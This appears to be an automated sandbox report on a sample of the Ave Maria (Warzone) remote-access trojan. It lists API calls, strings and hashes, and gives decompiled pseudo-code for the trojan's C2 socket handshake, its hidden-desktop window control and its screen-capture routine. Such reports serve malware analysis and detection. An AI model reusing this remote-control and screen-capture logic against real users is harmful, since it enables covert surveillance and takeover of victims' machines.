Part of subcall function 00E846F7: htons.WS2_32(00000000), ref: 00E84763
Part of subcall function 00E846F7: connect.WS2_32(00000000,?,00000010), ref: 00E84774

SetThreadDesktop.USER32 ref: 00E85BDF
send.WS2_32(00000000,AVE_MARIA,0000000A,00000000), ref: 00E85BF6
send.WS2_32(00000000,?), ref: 00E85C11
recv.WS2_32(00000000,?,00000004,00000000), ref: 00E85C2A
CreateThread.KERNEL32(00000000,00000000,Function_00014798,00000000,00000000,00000000), ref: 00E85C3E

Part of subcall function 00E857CD: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00E85892
Part of subcall function 00E857CD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00E858BA
Part of subcall function 00E857CD: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00E858DC
Part of subcall function 00E857CD: GetWindowsDirectoryA.KERNEL32(?,00000104,770BE3A0,?,00000000), ref: 00E858FE
Part of subcall function 00E857CD: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00E8592A

recv.WS2_32(00000000,?,00000004,00000000), ref: 00E85C6B
recv.WS2_32(00000000,?,00000004,00000000), ref: 00E85C83
recv.WS2_32(00000000,?,00000004,00000000), ref: 00E85C97
CreateThread.KERNEL32(00000000,00000000,Function_00015A71,00000000,00000000,00000000), ref: 00E85CF1

Part of subcall function 00E84A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00E84ADE
Part of subcall function 00E84A91: lstrcatA.KERNEL32(00000000,?), ref: 00E84B2F
Part of subcall function 00E84A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00E84B52
Part of subcall function 00E84A91: lstrcatA.KERNEL32(00000000,?,?), ref: 00E84B9B

WindowFromPoint.USER32(?,00000001), ref: 00E85D18
WindowFromPoint.USER32(00000000,?), ref: 00E85D82
SendMessageA.USER32 ref: 00E85DAF
PostMessageA.USER32(00000000,00000112,0000F020,00000000), ref: 00E85DCA
ScreenToClient.USER32 ref: 00E85DDA
GetWindowPlacement.USER32(00000000,?), ref: 00E85DFC
GetWindowLongA.USER32 ref: 00E85E28
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00E85E37
SendMessageA.USER32 ref: 00E85E48
FindWindowA.USER32 ref: 00E85E94
GetWindowRect.USER32 ref: 00E85EA2
PtInRect.USER32(?,?,?), ref: 00E85EB5
PostMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00E85EC9
recv.WS2_32(?,00000200,00000004,00000000), ref: 00E85EE3
TerminateThread.KERNEL32(00000000), ref: 00E85EF6
RealGetWindowClassA.USER32(00000000,?,00000104), ref: 00E85F37
lstrcmpA.KERNEL32(?,crpt), ref: 00E85F72
SendMessageA.USER32 ref: 00E85F8A
MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 00E85F9C
GetMenuItemID.USER32(00000000,00000000), ref: 00E85FA6
PostMessageA.USER32(00000000,000001E5,00000000,00000000), ref: 00E85FBB
PostMessageA.USER32(00000000,00000100,0000000D,00000000), ref: 00E85FC7
SendMessageA.USER32 ref: 00E85FFA
GetWindowRect.USER32 ref: 00E8601E
MoveWindow.USER32(?,?,00000004,00000000,00000004,00000000), ref: 00E860C9
ScreenToClient.USER32 ref: 00E860F8
ChildWindowFromPoint.USER32 ref: 00E86107
PostMessageA.USER32(00000000,?,?,?), ref: 00E8613D

Strings

++, xrefs: 00E85E72
crpt, xrefs: 00E85F60, 00E85F69
F8A/, xrefs: 00E85BBD
AVE_MARIA, xrefs: 00E85BF0
r}, xrefs: 00E85F47
,, xrefs: 00E85DF2

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Message$Postrecv$FromPointSendThread$Rectlstrcat$ClientCreateFolderItemLongMenuPathScreenValuesend$ChildClassDesktopDirectoryFindMoveOpenPlacementQueryRealStartupTerminateWindowsconnectgethostbynamehtonslstrcmpsocket
String ID: ++$,$AVE_MARIA$F8A/$crpt$r}
API String ID: 3286681106-1507845114
Opcode ID: b9fd1a3795bf9825d516e0f4b4000adf77effd028e59fa282b9be24ca88a8e0d
Instruction ID: 049cb35629a404bb065d859d244984562f664f29b8c6a1040f9e924274a12863
Opcode Fuzzy Hash: b9fd1a3795bf9825d516e0f4b4000adf77effd028e59fa282b9be24ca88a8e0d
Instruction Fuzzy Hash: 09F19372508301AFD721EF25CD88B6BBBE8EB89744F10191DF58DB61A1D770E908CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00E84798, Relevance: 56.2, APIs: 21, Strings: 11, Instructions: 232networkthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00E846F7: WSAStartup.WS2_32(00000202,?), ref: 00E84718
Part of subcall function 00E846F7: socket.WS2_32(00000002,00000001,00000000), ref: 00E84729
Part of subcall function 00E846F7: gethostbyname.WS2_32(00EAAD28), ref: 00E8473B
Part of subcall function 00E846F7: htons.WS2_32(00000000), ref: 00E84763
Part of subcall function 00E846F7: connect.WS2_32(00000000,?,00000010), ref: 00E84774

SetThreadDesktop.USER32 ref: 00E847C2
send.WS2_32(00000000,AVE_MARIA,0000000A,00000000), ref: 00E847E0
send.WS2_32(00000000,00000000,00000004,00000000), ref: 00E847F9
recv.WS2_32(00000000,?,00000004,00000000), ref: 00E84818
send.WS2_32(00000000,00000000), ref: 00E84842
recv.WS2_32(00000000,?,00000004,00000000), ref: 00E84A60
TerminateThread.KERNEL32(00000000), ref: 00E84A72

Strings

$, xrefs: 00E84875
.5&/, xrefs: 00E84892
$, xrefs: 00E848A2
(k"+, xrefs: 00E8486D
&8, xrefs: 00E84923
;<2, xrefs: 00E8491B
(k"+, xrefs: 00E8489A
F8A/, xrefs: 00E847A4
.5&/, xrefs: 00E84865
", xrefs: 00E848C8
AVE_MARIA, xrefs: 00E847DA

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: send$Threadrecv$DesktopStartupTerminateconnectgethostbynamehtonssocket
String ID: "$$$$$&8$(k"+$(k"+$.5&/$.5&/$;<2$AVE_MARIA$F8A/
API String ID: 1660028926-61365800
Opcode ID: f344541e9bfaa1481a9e7e1976fa38ff22f47e2042c99e3fdeab136622b9b201
Instruction ID: 92d13fc28fd458fc1ed0cca06f1f7fa607cfe49ea542605a43e31f80b485ee70
Opcode Fuzzy Hash: f344541e9bfaa1481a9e7e1976fa38ff22f47e2042c99e3fdeab136622b9b201
Instruction Fuzzy Hash: 3481A071108342AFE315EB61CC85F6BB7E8EF8A740F00151CF688AA190E770E949CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00E84426, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 222
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E84426(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp) {
				signed int _v8;
				struct tagRECT _v24;
				struct HDC__* _v36;
				intOrPtr _v40;
				void* _v44;
				struct HDC__* _v52;
				struct HDC__* _v56;
				struct HDC__* _v60;
				struct HDC__* _v64;
				int _v68;
				struct HDC__* _v72;
				struct HDC__* _v96;
				void* _v144;
				signed int _v152;
				struct HDC__* _v176;
				signed int _v188;
				signed int _t53;
				void* _t59;
				struct HWND__* _t61;
				void* _t73;
				void* _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				struct HWND__* _t87;
				void* _t100;
				int _t101;
				void* _t102;
				signed int _t104;
				signed int _t109;
				struct HWND__* _t110;
				signed int _t112;
				struct HDC__* _t114;
				void* _t115;
				signed int _t117;
				intOrPtr _t118;
				void* _t119;
				struct HDC__* _t121;
				void* _t122;
				struct HWND__* _t123;
				void* _t125;
				int _t126;
				char* _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;

				_t130 =  &_v44;
				_t53 =  *0xea9014; // 0xa413846
				_v8 = _t53 ^ _t130;
				_t100 = __edx;
				_t125 = __ecx;
				GetWindowRect(GetDesktopWindow(),  &_v24);
				_t114 = GetDC(0);
				_v36 = _t114;
				_t121 = CreateCompatibleDC(_t114);
				_v44 = _t121;
				_t59 = CreateCompatibleBitmap(_t114, _v24.top, _v24.right);
				_v60 = _t59;
				SelectObject(_t121, _t59);
				_v56 = _t114;
				_v52 = _t121;
				_t61 = GetTopWindow(0);
				if(_t61 == 0) {
					L6:
					__eflags = _t125 - _v40;
					_t126 =  >  ? _v40 : _t125;
					__eflags = _t100 - _v36;
					_t101 =  >  ? _v36 : _t100;
					__eflags = _t126 - _v40;
					if(_t126 != _v40) {
						L8:
						_t115 = CreateCompatibleBitmap(_t114, _t126, _t101);
						_t121 = CreateCompatibleDC(_v72);
						SelectObject(_t121, _t115);
						SetStretchBltMode(_t121, 4);
						__eflags = 0;
						StretchBlt(_t121, 0, 0, _t126, _t101, _v96, 0, 0, _v72, _v68, 0xcc0020);
						DeleteObject(_v144);
						DeleteDC(_v144);
						_v152 = _t115;
						L9:
						_t117 = 1;
						 *0xeaae58 = _t101 * _t126 * 3;
						_t73 =  *0xeaae74; // 0x0
						__eflags = _t73;
						if(_t73 == 0) {
							L12:
							E00E90985(_t73);
							E00E90985( *0xeaae88);
							E00E90985( *0xeaae80);
							_push( *0xeaae58);
							_t77 = E00E909A2();
							_push( *0xeaae58);
							 *0xeaae74 = _t77;
							_t78 = E00E909A2();
							_push( *0xeaae58);
							 *0xeaae88 = _t78;
							_t79 = E00E909A2();
							_t130 = _t130 + 0x18;
							 *0xeaae80 = _t79;
							_t73 =  *0xeaae74; // 0x0
							_t117 = 0;
							__eflags = 0;
							L13:
							 *0xeaae48 = _t126;
							 *0xeaae4c = _t101;
							_t102 = _v152;
							GetDIBits(_t121, _t102, 0, _t101, _t73, 0xeaae44, 0);
							DeleteObject(_t102);
							ReleaseDC(0, _v176);
							DeleteDC(_t121);
							__eflags = _t117;
							if(_t117 == 0) {
								_push( *0xeaae58);
								_push( *0xeaae74);
								_push( *0xeaae88);
								L32:
								E00E8D670();
								_t131 = _t130 + 0xc;
								__eflags = 0;
								L33:
								__eflags = _v152 ^ _t131;
								return E00E8AE43(_v152 ^ _t131);
							}
							_t109 =  *0xeaae58; // 0x0
							_t87 = 0;
							_t122 =  *0xeaae74; // 0x0
							__eflags = _t109;
							if(_t109 == 0) {
								L20:
								E00E8D670( *0xeaae80, _t122, _t109);
								_t112 =  *0xeaae58; // 0x0
								_t131 = _t130 + 0xc;
								_v188 = 1;
								_t110 = 0;
								_t36 = _t112 - 1; // -1
								__eflags = _t36;
								if(_t36 == 0) {
									L30:
									goto L33;
								}
								_t118 =  *0xeaae88; // 0x0
								_t104 = _t118 - _t122;
								__eflags = _t104;
								do {
									_t128 = _t122 + _t110;
									__eflags =  *_t128 -  *((intOrPtr*)(_t104 + _t128));
									if( *_t128 !=  *((intOrPtr*)(_t104 + _t128))) {
										L26:
										_t129 = 0;
										__eflags = 0;
										_v188 = 0;
										goto L27;
									}
									__eflags =  *((intOrPtr*)(_t122 +  &(_t110->i))) -  *((intOrPtr*)(_t118 +  &(_t110->i)));
									if( *((intOrPtr*)(_t122 +  &(_t110->i))) !=  *((intOrPtr*)(_t118 +  &(_t110->i)))) {
										goto L26;
									}
									__eflags =  *((intOrPtr*)(_t122 +  &(_t110->i))) -  *((intOrPtr*)(_t118 +  &(_t110->i)));
									if( *((intOrPtr*)(_t122 +  &(_t110->i))) !=  *((intOrPtr*)(_t118 +  &(_t110->i)))) {
										goto L26;
									}
									 *_t128 = 0xff;
									_t129 = _v188;
									 *((short*)(_t122 +  &(_t110->i))) = 0xc9ae;
									_t112 =  *0xeaae58; // 0x0
									L27:
									_t110 =  &(_t110->i);
									_t51 = _t112 - 1; // -1
									__eflags = _t110 - _t51;
								} while (_t110 < _t51);
								__eflags = _t129;
								if(_t129 != 0) {
									goto L30;
								}
								_push(_t112);
								_push( *0xeaae80);
								_push(_t118);
								goto L32;
							} else {
								goto L15;
							}
							do {
								L15:
								__eflags =  *((char*)(_t122 + _t87)) - 0xff;
								if( *((char*)(_t122 + _t87)) == 0xff) {
									__eflags =  *((char*)(_t122 +  &(_t87->i))) - 0xae;
									if( *((char*)(_t122 +  &(_t87->i))) == 0xae) {
										__eflags =  *((char*)(_t122 +  &(_t87->i))) - 0xc9;
										if( *((char*)(_t122 +  &(_t87->i))) == 0xc9) {
											 *((char*)(_t122 +  &(_t87->i))) = 0xaf;
											_t109 =  *0xeaae58; // 0x0
										}
									}
								}
								_t87 =  &(_t87->i);
								__eflags = _t87 - _t109;
							} while (_t87 < _t109);
							goto L20;
						}
						__eflags =  *0xeaae48 - _t126; // 0x0
						if(__eflags != 0) {
							goto L12;
						}
						__eflags =  *0xeaae4c - _t101; // 0x0
						if(__eflags == 0) {
							goto L13;
						}
						goto L12;
					}
					__eflags = _t101 - _v36;
					if(_t101 == _v36) {
						goto L9;
					}
					goto L8;
				} else {
					_t119 = GetWindow;
					_push(1);
					_push(_t61);
					while(1) {
						_t123 = GetWindow();
						if(_t123 == 0 || E00E84383(_t100, _t119, _t123, _t123,  &_v56) == 0) {
							break;
						}
						_push(3);
						_push(_t123);
					}
					_t114 = _v60;
					_t121 = _v64;
					goto L6;
				}
			}

0x00e84426
0x00e84429
0x00e84430
0x00e84438
0x00e8443a
0x00e84448
0x00e84456
0x00e84459
0x00e84467
0x00e8446d
0x00e84472
0x00e8447a
0x00e8447e
0x00e84486
0x00e8448a
0x00e8448e
0x00e84496
0x00e844c5
0x00e844c5
0x00e844c9
0x00e844ce
0x00e844d2
0x00e844d7
0x00e844db
0x00e844e3
0x00e844f0
0x00e844f8
0x00e844fc
0x00e84505
0x00e84514
0x00e84525
0x00e8452f
0x00e84539
0x00e8453f
0x00e84543
0x00e8454a
0x00e8454e
0x00e84553
0x00e84558
0x00e8455a
0x00e8456c
0x00e8456d
0x00e84578
0x00e84583
0x00e84588
0x00e8458e
0x00e84593
0x00e84599
0x00e8459e
0x00e845a3
0x00e845a9
0x00e845ae
0x00e845b3
0x00e845b6
0x00e845bb
0x00e845c0
0x00e845c0
0x00e845c2
0x00e845c2
0x00e845d3
0x00e845d9
0x00e845df
0x00e845e6
0x00e845f1
0x00e845f8
0x00e845fe
0x00e84600
0x00e846c8
0x00e846ce
0x00e846d4
0x00e846da
0x00e846da
0x00e846df
0x00e846e2
0x00e846e4
0x00e846ec
0x00e846f6
0x00e846f6
0x00e84606
0x00e8460c
0x00e8460e
0x00e84614
0x00e84616
0x00e8463e
0x00e84646
0x00e8464b
0x00e84651
0x00e84654
0x00e8465c
0x00e8465e
0x00e84661
0x00e84663
0x00e846c3
0x00000000
0x00e846c5
0x00e84665
0x00e8466d
0x00e8466d
0x00e8466f
0x00e8466f
0x00e84675
0x00e84678
0x00e846a5
0x00e846a5
0x00e846a5
0x00e846a7
0x00000000
0x00e846a7
0x00e8467e
0x00e84682
0x00000000
0x00000000
0x00e84688
0x00e8468c
0x00000000
0x00000000
0x00e8468e
0x00e84692
0x00e84696
0x00e8469d
0x00e846ab
0x00e846ab
0x00e846ae
0x00e846b1
0x00e846b1
0x00e846b5
0x00e846b7
0x00000000
0x00000000
0x00e846b9
0x00e846ba
0x00e846c0
0x00000000
0x00000000
0x00000000
0x00000000
0x00e84618
0x00e84618
0x00e84618
0x00e8461c
0x00e8461e
0x00e84623
0x00e84625
0x00e8462a
0x00e8462c
0x00e84631
0x00e84631
0x00e8462a
0x00e84623
0x00e84637
0x00e8463a
0x00e8463a
0x00000000
0x00e84618
0x00e8455c
0x00e84562
0x00000000
0x00000000
0x00e84564
0x00e8456a
0x00000000
0x00000000
0x00000000
0x00e8456a
0x00e844dd
0x00e844e1
0x00000000
0x00000000
0x00000000
0x00e84498
0x00e84498
0x00e8449e
0x00e844a0
0x00e844a1
0x00e844a3
0x00e844a7
0x00000000
0x00000000
0x00e844b8
0x00e844ba
0x00e844ba
0x00e844bd
0x00e844c1
0x00000000
0x00e844c1

APIs

GetDesktopWindow.USER32 ref: 00E8443C
GetWindowRect.USER32 ref: 00E84448
GetDC.USER32 ref: 00E84450
CreateCompatibleDC.GDI32(00000000), ref: 00E8445D
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E84472
SelectObject.GDI32(00000000,00000000), ref: 00E8447E
GetTopWindow.USER32 ref: 00E8448E
GetWindow.USER32(00000000,00000001), ref: 00E844A1

Part of subcall function 00E84383: IsWindowVisible.USER32 ref: 00E8439F
Part of subcall function 00E84383: GetWindowLongA.USER32 ref: 00E843B9
Part of subcall function 00E84383: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00E843C3
Part of subcall function 00E84383: GetVersionExA.KERNEL32(00000094), ref: 00E843F0
Part of subcall function 00E84383: GetTopWindow.USER32 ref: 00E84400

CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E844E6
CreateCompatibleDC.GDI32(?), ref: 00E844F2
SelectObject.GDI32(00000000,00000000), ref: 00E844FC
SetStretchBltMode.GDI32(00000000,00000004), ref: 00E84505
StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 00E84525
DeleteObject.GDI32(?), ref: 00E8452F
DeleteDC.GDI32(?), ref: 00E84539
GetDIBits.GDI32(00000000,?,00000000,?,00000000,00EAAE44,00000000), ref: 00E845DF
DeleteObject.GDI32(?), ref: 00E845E6
ReleaseDC.USER32 ref: 00E845F1
DeleteDC.GDI32(00000000), ref: 00E845F8

Strings

F8A/, xrefs: 00E84429

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CompatibleCreateDeleteObject$BitmapLongSelectStretch$BitsDesktopModeRectReleaseVersionVisible
String ID: F8A/
API String ID: 2588145-73971870
Opcode ID: b5b161f32d1d2d86bcb475ee29e38a06cd61ee8daa8d70f5010b51c32902aefe
Instruction ID: 59dbbc89f9037be1f6e3d9bf4780962af36d7c84f43cbe55fc412c560f0246a4
Opcode Fuzzy Hash: b5b161f32d1d2d86bcb475ee29e38a06cd61ee8daa8d70f5010b51c32902aefe
Instruction Fuzzy Hash: 9481D1B1108341AFC711EF22DC4493ABBF9FB8E314F48552CF589B21A1D771A989DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E9CB6A, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E9CB6A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				short _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_t85 = _a4;
				_push(__esi);
				_push(__edi);
				_t33 = E00E9830D(__ecx, __edx);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E00E9CAFB("di�", 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E00E9C460(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E00E9C584();
					} else {
						E00E9C4E9(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E00E9CAFB(0xe75d90, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E00E9C584();
							} else {
								E00E9C4E9(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E00E9C9B4(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xe940cc
							_t87 = _t15;
							 *_t87 = 0;
							_t115 = _t96 + 2;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t98 = _t96 - _t115 >> 1;
							_push((_t96 - _t115 >> 1) + 1);
							_t47 = E00E998A4(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00E92919();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0xea9014; // 0xa413846
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E00E9830D(_t98, _t115);
								_t88 = _t52;
								_t121 =  *(E00E9830D(_t98, _t115) + 0x34c);
								_t128 = E00E9D2AD(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00E9BE5E(_t88, _t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E00E9D3E1(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E00E8AE43(_v32 ^ _t131);
							} else {
								if(E00E9DBF9(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0xe9402c
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xe940cc
									if(E00E9DBF9(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E00EA52C7(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xe940cc
											if(E00E9DBF9(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E00EA52C7(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E00E952AD(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E00E998A4(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x00e9cb6f
0x00e9cb70
0x00e9cb71
0x00e9cb72
0x00e9cb75
0x00e9cb76
0x00e9cb77
0x00e9cb7e
0x00e9cb80
0x00e9cb83
0x00e9cb83
0x00e9cb86
0x00e9cb86
0x00e9cb8c
0x00e9cb8f
0x00e9cb92
0x00e9cb92
0x00e9cb95
0x00e9cb98
0x00e9cb9a
0x00e9cba0
0x00e9cba2
0x00e9cba7
0x00e9cbb1
0x00e9cbb6
0x00e9cbb8
0x00e9cbbb
0x00e9cbbb
0x00e9cbbd
0x00e9cbc1
0x00e9cc0a
0x00000000
0x00e9cbc3
0x00e9cbc8
0x00e9cbd1
0x00e9cbca
0x00e9cbca
0x00e9cbca
0x00e9cbdc
0x00e9cbe6
0x00e9cbeb
0x00e9cbf0
0x00e9cbf6
0x00e9cbfa
0x00e9cc03
0x00e9cbfc
0x00e9cbfc
0x00e9cbfc
0x00e9cc0f
0x00e9cc0f
0x00e9cbf0
0x00e9cbdc
0x00e9cc15
0x00e9cd51
0x00e9cd51
0x00000000
0x00e9cc1b
0x00e9cc1b
0x00e9cc24
0x00e9cc35
0x00e9cc2b
0x00e9cc2b
0x00e9cc2b
0x00e9cc3c
0x00e9cc40
0x00000000
0x00e9cc64
0x00e9cc64
0x00e9cc69
0x00e9cc6b
0x00e9cc6b
0x00e9cc6d
0x00e9cc72
0x00e9cd4c
0x00e9cd4e
0x00e9cd53
0x00e9cd59
0x00e9cc78
0x00e9cc78
0x00e9cc7b
0x00e9cc7b
0x00e9cc83
0x00e9cc86
0x00e9cc89
0x00e9cc89
0x00e9cc8c
0x00e9cc8f
0x00e9cc97
0x00e9cc9c
0x00e9cca3
0x00e9cca8
0x00e9ccad
0x00e9cd5a
0x00e9cd5c
0x00e9cd5d
0x00e9cd5e
0x00e9cd5f
0x00e9cd60
0x00e9cd61
0x00e9cd66
0x00e9cd6a
0x00e9cd72
0x00e9cd79
0x00e9cd7c
0x00e9cd7d
0x00e9cd81
0x00e9cd82
0x00e9cd87
0x00e9cd8f
0x00e9cd9e
0x00e9cdaa
0x00e9cdbb
0x00e9cdc3
0x00e9cddd
0x00e9cdea
0x00e9cded
0x00e9cdf0
0x00e9cdf0
0x00e9cdc5
0x00e9cdc5
0x00e9cdc7
0x00e9ce0d
0x00e9ccb3
0x00e9ccc3
0x00000000
0x00e9ccc9
0x00e9cccb
0x00e9cccb
0x00e9ccd7
0x00e9cce5
0x00000000
0x00e9cce7
0x00e9cce7
0x00e9ccea
0x00e9ccf0
0x00e9ccf3
0x00e9cd03
0x00e9cd08
0x00e9cd16
0x00000000
0x00000000
0x00000000
0x00000000
0x00e9ccf5
0x00e9ccf5
0x00e9ccf8
0x00e9ccfe
0x00e9cd01
0x00e9cd18
0x00e9cd18
0x00e9cd24
0x00e9cd44
0x00000000
0x00e9cd26
0x00e9cd26
0x00e9cd30
0x00e9cd35
0x00e9cd3a
0x00000000
0x00e9cd3c
0x00000000
0x00e9cd3c
0x00e9cd3a
0x00000000
0x00000000
0x00000000
0x00e9cd01
0x00e9ccf3
0x00e9cce5
0x00e9ccc3
0x00e9ccad
0x00e9cc72
0x00e9cc40

APIs

Part of subcall function 00E9830D: GetLastError.KERNEL32(00000000,00000001,00000004,00E91A0E,00000001,00000000,00000002,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E98312
Part of subcall function 00E9830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00E98F84,00000002,00000000,00000001,00000002), ref: 00E983B0

GetACP.KERNEL32(00000055,?,?,?,?,?,00E93FAC,?,?,?,?,?,?,00000004), ref: 00E9CC2B
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,00E93FAC,?,?,?,?,?,?,00000004), ref: 00E9CC56
_wcschr.LIBVCRUNTIME ref: 00E9CCEA
_wcschr.LIBVCRUNTIME ref: 00E9CCF8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00E93FAC,00000000,00E940CC), ref: 00E9CDBB

Strings

utf8, xrefs: 00E9CD28
F8A/, xrefs: 00E9CD72
di, xrefs: 00E9CBAC

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: F8A/$di$utf8
API String ID: 4147378913-182159331
Opcode ID: 6e4e64f918de46bf6b0dfa58b5e3006d314ddab6fd350da0c29bcec3d773154f
